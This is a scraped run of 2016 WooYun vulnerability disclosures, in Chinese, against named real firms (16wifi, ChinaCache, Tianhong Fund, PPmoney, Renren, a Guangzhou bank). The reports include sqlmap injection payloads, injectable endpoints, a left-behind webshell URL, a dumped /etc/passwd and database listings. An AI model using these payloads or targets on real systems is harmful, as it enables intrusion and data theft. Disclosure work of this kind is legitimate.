相关厂商: 16wifi.com

漏洞作者: 路人甲

提交时间: 2016-06-20 15:10

修复时间: 2016-06-23 20:26

公开时间: 2016-06-23 20:26

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 远程命令执行

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-20: 细节已通知厂商并且等待厂商处理中
2016-06-23: 厂商已经确认,细节仅向厂商公开
2016-06-23: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

mask 区域
1.http://**.**.**/_
**********
*****令用*****
*****, Passwor*****
***** Passwo*****
*****, Passwo*****
*****asswo*****
*****, Passwo*****
*****, Passwor*****
*****, Passwor*****
*****, Passwo*****
*****sword:li*****
***** Passwor*****

我用lideqiang登录的这个权限比较高

111.png

命令执行

4个节点

111.png

http://*.*.*.*:9080/computer/(master)/script

111.png

http://*.*.*.*:9080/computer/11/script

111.png

剩下的两台不在演示

涉及大量源码

code 区域
Failed	40%	Last/current build console output	ANDROID_16WIFI_STUDIO	2 days 20 小时 - #13	2 days 19 小时 - #14	3 分 14 秒	计划一次构建: ANDROID_16WIFI_STUDIO	 
Success	100%	Last/current build console output	ANDROID_DEV_MAIN	2 小时 28 分 - #24	6 days 0 小时 - #15	3 分 21 秒	计划一次构建: ANDROID_DEV_MAIN	 
Failed	0%	Last/current build console output	ANDROID_DEV_SDK	没有	2 days 22 小时 - #20	31 秒	计划一次构建: ANDROID_DEV_SDK	 
Failed	0%	Last/current build console output	ANDROID_DEV_SHOP	没有	5 days 23 小时 - #7	29 秒	计划一次构建: ANDROID_DEV_SHOP	 
Aborted	80%	Last/current build console output	CI_AUTH	3 days 2 小时 - #12	5 days 18 小时 - #9	50 秒	计划一次构建: CI_AUTH	 
Success	100%	Last/current build console output	CI_BAIWU	2 days 22 小时 - #16	6 days 2 小时 - #10	19 秒	计划一次构建: CI_BAIWU	 
Success	80%	Last/current build console output	CI_BASEPOM	5 days 4 小时 - #8	6 days 4 小时 - #4	13 秒	计划一次构建: CI_BASEPOM	 
Success	100%	Last/current build console output	CI_BORN	2 days 21 小时 - #6	无	16 秒	计划一次构建: CI_BORN	 
Success	40%	Last/current build console output	CI_COMMUNICAT	5 days 4 小时 - #5	5 days 19 小时 - #3	33 秒	计划一次构建: CI_COMMUNICAT	 
Unstable	78%	Last/current build console output	CI_DEVICE	2 days 19 小时 - #20	3 days 3 小时 - #17	1 分 30 秒	计划一次带参数的构建: CI_DEVICE	 
Success	40%	Last/current build console output	CI_E6WIFI_CONTENT	5 days 18 小时 - #7	5 days 18 小时 - #5	1 分 13 秒	计划一次构建: CI_E6WIFI_CONTENT	 
Unstable	40%	Last/current build console output	CI_E6WIFI_MOVIE	2 days 22 小时 - #5	4 days 0 小时 - #4	1 分 20 秒	计划一次构建: CI_E6WIFI_MOVIE	 
Success	100%	Last/current build console output	CI_E6WIFI_PARENT	18 days - #6	无	16 秒	计划一次构建: CI_E6WIFI_PARENT	 
Success	80%	Last/current build console output	CI_ORDER	48 分 - #45	2 days 22 小时 - #41	26 秒	计划一次构建: CI_ORDER	 
Success	100%	Last/current build console output	CI_PAY	2 days 21 小时 - #19	18 days - #13	17 秒	计划一次构建: CI_PAY	 
Success	80%	Last/current build console output	CI_SHOP	20 分 - #81	4 小时 20 分 - #78	1 分 7 秒	计划一次构建: CI_SHOP	 
Failed	0%	Last/current build console output	CI_SMS	没有	3 days 4 小时 - #8	28 秒	计划一次构建: CI_SMS	 
Success	100%	Last/current build console output	CI_SMS_CORE	5 days 4 小时 - #6	17 days - #1	17 秒	计划一次构建: CI_SMS_CORE	 
Success	60%	Last/current build console output	CI_SMS_SGCMGM	5 days 18 小时 - #6	17 days - #3	1 分 4 秒	计划一次构建: CI_SMS_SGCMGM	 
Success	80%	Last/current build console output	CI_TRADE	4 小时 42 分 - #10	2 days 22 小时 - #8	41 秒	计划一次构建: CI_TRADE	 
Failed	40%	Last/current build console output	CI_USER	5 days 18 小时 - #4	4 days 1 小时 - #5	39 秒	计划一次构建: CI_USER	 
Failed	80%	Last/current build console output	CI_UTILITY	4 days 2 小时 - #7	2 days 20 小时 - #8	1 分 0 秒	计划一次构建: CI_UTILITY	 
Failed	50%	Last/current build console output	SONAR_AUTH	4 days 5 小时 - #1	3 days 4 小时 - #2	1 分 19 秒	计划一次构建: SONAR_AUTH	 
Success	100%	Last/current build console output	SONAR_BAIWU	2 days 20 小时 - #2	无	29 秒	计划一次构建: SONAR_BAIWU	 
Success	100%	Last/current build console output	SONAR_BORN	2 days 21 小时 - #2	无	27 秒	计划一次构建: SONAR_BORN	 
Success	100%	Last/current build console output	SONAR_COMMUNICAT	4 days 4 小时 - #1	无	58 秒	计划一次构建: SONAR_COMMUNICAT	 
Unstable	78%	Last/current build console output	SONAR_DEVICE	2 days 20 小时 - #9	3 days 2 小时 - #8	3 分 17 秒	计划一次构建: SONAR_DEVICE	 
Success	100%	Last/current build console output	SONAR_E6WIFI_CONTENT	4 days 4 小时 - #1	无	1 分 32 秒	计划一次构建: SONAR_E6WIFI_CONTENT	 
Unstable	66%	Last/current build console output	SONAR_E6WIFI_MOVIE	2 days 22 小时 - #3	4 days 0 小时 - #2	1 分 24 秒	计划一次构建: SONAR_E6WIFI_MOVIE	 
Success	100%	Last/current build console output	SONAR_ORDER	24 分 - #28	3 days 18 小时 - #21	51 秒	计划一次构建: SONAR_ORDER	 
Success	80%	Last/current build console output	SONAR_PAY	2 days 20 小时 - #11	17 days - #7	36 秒	计划一次构建: SONAR_PAY	 
Success	40%	Last/current build console output	SONAR_SHOP	19 分 - #59	4 小时 19 分 - #57	2 分 13 秒	计划一次构建: SONAR_SHOP	 
Failed	0%	Last/current build console output	SONAR_SMS	没有	3 days 2 小时 - #2	24 秒	计划一次构建: SONAR_SMS	 
Success	100%	Last/current build console output	SONAR_SMS_CORE	4 days 4 小时 - #1	无	28 秒	计划一次构建: SONAR_SMS_CORE	 
Success	100%	Last/current build console output	SONAR_SMS_SGCMGM	4 days 4 小时 - #1	无	1 分 34 秒	计划一次构建: SONAR_SMS_SGCMGM	 
Success	75%	Last/current build console output	SONAR_TRADE	4 小时 40 分 - #4	2 days 22 小时 - #2	54 秒	计划一次构建: SONAR_TRADE	 
Success	100%	Last/current build console output	SONAR_USER	4 days 4 小时 - #1	无	1 分 13 秒	计划一次构建: SONAR_USER	 
Failed	66%	Last/current build console output	SONAR_UTILITY	4 days 2 小时 - #2	2 days 18 小时 - #3	1 分 31 秒

111.png

主干

111.png

很多敏感信息 不在一一证明

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

saslauth:x:499:76:”Saslauthd user”:/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

nginx:x:498:498:nginx user:/var/cache/nginx:/sbin/nologin

zabbix:x:500:500::/home/zabbix:/bin/bash

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

image:x:501:501::/opt/clientpicture.16wifi.com/16wifi/client/index/img/:/bin/bash

jenkins:x:497:497:Jenkins Continuous Integration Server:/var/lib/jenkins:/bin/false

nexus:x:502:502::/var/lib/nexus:/bin/bash

貌似可以直入内网

111.png

漏洞证明:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

saslauth:x:499:76:”Saslauthd user”:/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

nginx:x:498:498:nginx user:/var/cache/nginx:/sbin/nologin

zabbix:x:500:500::/home/zabbix:/bin/bash

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

image:x:501:501::/opt/clientpicture.16wifi.com/16wifi/client/index/img/:/bin/bash

jenkins:x:497:497:Jenkins Continuous Integration Server:/var/lib/jenkins:/bin/false

nexus:x:502:502::/var/lib/nexus:/bin/bash

修复方案:

弱口令

版权声明:转载请注明来源 路人甲@乌云

0day

ChinaCache某系统JBoss配置不当导致Getshell

缺陷编号: WooYun-2016-221124

漏洞标题: ChinaCache某系统JBoss配置不当导致Getshell

相关厂商: ChinaCache

漏洞作者: 路人甲

提交时间: 2016-06-20 13:40

公开时间: 2016-06-24 15:06

漏洞类型: 系统/服务运维配置不当

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-20: 细节已通知厂商并且等待厂商处理中
2016-06-20: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

深处内网/未深入

详细说明:

http://www13.chinacache.com:9000/jmx-console/

0.png

1.png

2.png

漏洞证明:

3.png

4.png

shell证明地址请删除:

http://www13.chinacache.com:9000/is/index.jsp

mask 区域
1.http://**.**.**/is/index.jsp

修复方案:

@@

版权声明:转载请注明来源 路人甲@乌云

0day

天弘基金主站存在MySql注入

缺陷编号: WooYun-2016-221041

漏洞标题: 天弘基金主站存在MySql注入

相关厂商: 天弘基金管理有限公司

漏洞作者: 丶n

提交时间: 2016-06-20 09:04

修复时间: 2016-06-21 10:23

公开时间: 2016-06-21 10:23

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-20: 细节已通知厂商并且等待厂商处理中
2016-06-21: 厂商已经确认,细节仅向厂商公开
2016-06-21: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt 给个高分吧.

详细说明:

http://www.thfund.com.cn/

天弘基金主站

http://www.thfund.com.cn//thfund/fundlist/search/api/?word=e

word参数存在注入

code 区域
GET parameter 'word' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) r
equests:
---
Parameter: word (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: word=e%' AND 4468=4468 AND '%'='

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
    Payload: word=e%' AND (SELECT * FROM (SELECT(SLEEP(5)))scvx) AND '%'='
---
[08:07:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.20
back-end DBMS: MySQL 5.0.12

code 区域
current user:    'thfund@10.163.0.50494547\x1f\x08'

漏洞证明:

code 区域
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] thweb

code 区域
[08:18:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.20
back-end DBMS: MySQL 5.0.12
[08:18:46] [INFO] fetching tables for database: 'thweb'
[08:18:46] [INFO] fetching number of tables for database 'thweb'
[08:18:46] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[08:18:46] [INFO] retrieved: 284
[08:18:54] [INFO] retrieved: a_content_body
[08:20:04] [INFO] retrieved: a_content_category
[08:20:54] [INFO] retrieved: a_w_content
[08:21:46] [INFO] retrieved: a_w_content_1
[08:22:07] [INFO] retrieved: aa_channel_category
[08:23:29] [INFO] retrieved: aa_fundday
[08:24:13] [INFO] retrieved: accesslog
[08:25:00] [INFO] retrieved: actions
[08:25:27] [INFO] retrieved: aliyunoss_file
[08:26:35] [INFO] retrieved: authmap
[08:27:07] [INFO] retrieved: batch
[08:27:36] [INFO] retrieved: b

表太多了 ,就不跑了 仅证明危害

0day

Discuz门户权限SSRF

相关厂商: Discuz!

漏洞作者: mutepig

提交时间: 2016-06-21 14:43

公开时间: 2016-09-20 08:40

漏洞类型: 设计缺陷/逻辑错误

危害等级: 中

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

4人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-21: 细节已通知厂商并且等待厂商处理中
2016-06-22: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息

简要描述:

观摩之前discuz的redis+ssrf,然而没有一个合适的ssrf来帮忙,于是就想看看有没有一个合适的ssrf,于是找到了一个只用jpg就能攻击的地方,然而需要门户文章发表\修改权限。。

漏洞hash:6b9c4e6ec2dcd8b220ff377adc5d613a

版权声明:转载请注明来源 mutepig@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-22 08:40

厂商回复:

之前的漏洞汇报已修复

0day

万惠金融PPmoney平台存在SQl注入(可能涉及敏感数据)

缺陷编号: WooYun-2016-221605

漏洞标题: 万惠金融PPmoney平台存在SQl注入(可能涉及敏感数据)

相关厂商: ppmoney.com

漏洞作者: 路人甲

提交时间: 2016-06-21 16:37

修复时间: 2016-06-22 15:53

公开时间: 2016-06-22 15:53

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

1人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-21: 细节已通知厂商并且等待厂商处理中
2016-06-21: 厂商已经确认,细节仅向厂商公开
2016-06-22: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

基于时间得SQL注入漏洞

详细说明:

漏洞地址:http://mcenter6-xiaop.ppmoney.com/statistic.php?m=Count&a=collection&type=chatjs&siteid=kf_9150&kfid=kf_9150_ISME9754_T2D_6022&guestid=kf_9150_ISME9754_guestE2194B7F-0543-7B&action=11&htmlsid=1466134524852011&chatsession=&settingid=kf_9150_1452647794846&ts=1466134525371

域名:mcenter6-xiaop.ppmoney.com

随便找了下,找到一个注射点,测试如下:

3.png

再跑了下能够看到相关数据库、用户名等;

2.png

再往下。。。

哥是有节操的人,没有往下了

漏洞证明:

如上

修复方案:

进行参数检查,拦截带有SQL语法的参数传入应用程序

0day

北京一路热点(16wifi)主要系统存安全漏洞可Getshell/root权限

相关厂商: 16wifi.com

漏洞作者: 路人甲

提交时间: 2016-06-22 18:49

修复时间: 2016-06-23 20:57

公开时间: 2016-06-23 20:57

漏洞类型: 后台弱口令

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: admin/admin弱口令

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-22: 细节已通知厂商并且等待厂商处理中
2016-06-23: 厂商已经确认,细节仅向厂商公开
2016-06-23: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

没错,还是我.第三发。。

详细说明:

其实是主站getshell

怕别人乱搞 没敢写标题里

mask 区域
*****ifi.*****
*****5.3*****

mask 区域
1.http://**.**.**/_
*****令 ad*****

111.png

过程请参考http://zone.wooyun.org/content/27737

首先put一个txt上去

111.png

来下面的url找下绝对路径

mask 区域
1.http://**.**.**/admin/test/systemProperties.jsp

111.png

结合找到的绝对路径和刚才传的txt小马 move一下

mask 区域
1.http://**.**.**/admin/test/ver.jsp

111.png

111.png

主站的日志

111.png

漏洞证明:

111.png

111.png

修复方案:

ActiveMQ弱口令

0day

广州市农商行源码泄露(不少证件证和照片)

缺陷编号: WooYun-2016-222125

漏洞标题: 广州市农商行源码泄露(不少证件证和照片)

相关厂商: 广州农商行

漏洞作者: 路人甲

提交时间: 2016-06-22 20:17

公开时间: 2016-06-24 11:19

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 10

漏洞状态: 已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-22: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

广州市农商行

code 区域
http://**.**.**.**/upload.rar

源文件下载。 内存有点大

8.png

有不少证件照在里面,不知道是员工的还是客户的

1.png

2.png

3.png

4.png

5.png

6.png

漏洞证明:

广州市农商行

code 区域
http://**.**.**.**/upload.rar

源文件下载。 内存有点大

8.png

有不少证件照在里面,不知道是员工的还是客户的

1.png

2.png

3.png

4.png

5.png

6.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-24 11:19

厂商回复:

漏洞可能已被发现并修复,并未能复现

最新状态:

暂无

0day

乌云某处逻辑错误导致越权

缺陷编号: WooYun-2016-222083

漏洞标题: 乌云某处逻辑错误导致越权

相关厂商: 乌云官方

漏洞作者: 路人甲

提交时间: 2016-06-23 12:05

修复时间: 2016-06-23 12:20

公开时间: 2016-06-23 12:20

漏洞类型: 未授权访问/权限绕过

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经修复

漏洞详情

披露状态:

2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-23: 厂商已经确认,细节仅向厂商公开
2016-06-23: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

危害:厂商可查看所有自家漏洞提交者的乌云ID(包括路人甲)

利用过程:

打开漏洞后,点击“给漏洞作者发送礼物”,通过抓包即可得到含有该漏洞提交者的whitehatid,相应链接为:

code 区域
http://www.wooyun.org/actdo.php?action=sms&do=giftremind&corpid=1&whitehatid=11111

id为1的厂商向whitehatid为11111的白帽子发送礼物接收提醒,因此提交此漏洞的白帽子whitehatid为11111.

在获取到白帽子的whitehatid后,只需找到一个地方能够对应到白帽子的乌云id即可;

可能获知whitehatid<->白帽子id的对应方法还有其他的,这里我仅用了下面这个来实现。

访问以下链接,向该白帽子索取联系方式(但无需白帽子确认)

code 区域
http://www.wooyun.org/actdo.php?action=sms&do=contactwhitehat&whitehatid=11111

接着继续访问以下链接提醒白帽子接收礼物

code 区域
http://www.wooyun.org/actdo.php?action=sms&do=giftremind&corpid=1&whitehatid=11111

经测试发现,只要厂商曾经尝试索取白帽子联系方式后(不管是否成功获取),再提醒白帽子接收礼物,即可在厂商信息主页处看到给****发送礼物,此时白帽子的乌云ID就出来了。

漏洞证明:

具体就不截图了,还请自行测试,有劳~

修复方案:

希望能改下,辛苦了!

版权声明:转载请注明来源 路人甲@乌云

0day

人人网某处SQL注入影响大量数据

缺陷编号: WooYun-2016-222273

漏洞标题: 人人网某处SQL注入影响大量数据

相关厂商: 人人网

漏洞作者: 路人甲

提交时间: 2016-06-23 12:21

公开时间: 2016-06-24 12:19

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞详情

披露状态:

2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域
http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)

export=txt&companyId=1&subStrSql=*

398.png

dba权限

399.png

code 区域
Database: live800_im
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| visitor_access      | 15081675 |
| operator_status     | 633129  |
| chat_topic          | 616252  |
| live800_system      | 410676  |
| chat_content        | 289363  |
| chat_sta            | 289308  |
| chat_info           | 285963  |
| leaveword_topic     | 161506  |
| trustful_visitor    | 78942   |
| leaveword           | 74624   |
| contact             | 71702   |
| cookie_contact      | 71702   |
| company_config_data | 69254   |
| lost                | 51034   |
| sync_info           | 23170   |
| op_chat_content     | 7200    |
| daily_flow_capacity | 1329    |
| sys_operate_log     | 1266    |
| faq                 | 115     |
| operator            | 82      |
| privilege           | 82      |
| company_config      | 36      |
| user_defined_button | 18      |
| company_ui_config   | 16      |
| config_template     | 12      |
| user_invite         | 12      |
| company_skill       | 11      |
| ad_column           | 10      |
| routing_action      | 6       |
| chat_config         | 4       |
| leaveword_box       | 3       |
| notify              | 3       |
| routing_condition   | 3       |
| routing_policy      | 3       |
| routing_rule        | 3       |
| canned_url          | 1       |
| company             | 1       |
| company_style       | 1       |
| customization       | 1       |
| fuf                 | 1       |
| ip_prohibit         | 1       |
| operator_account    | 1       |
+---------------------+---------+

漏洞证明:

398.png

修复方案:

改改改

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-24 12:19

厂商回复:

忽略

最新状态:

暂无

0day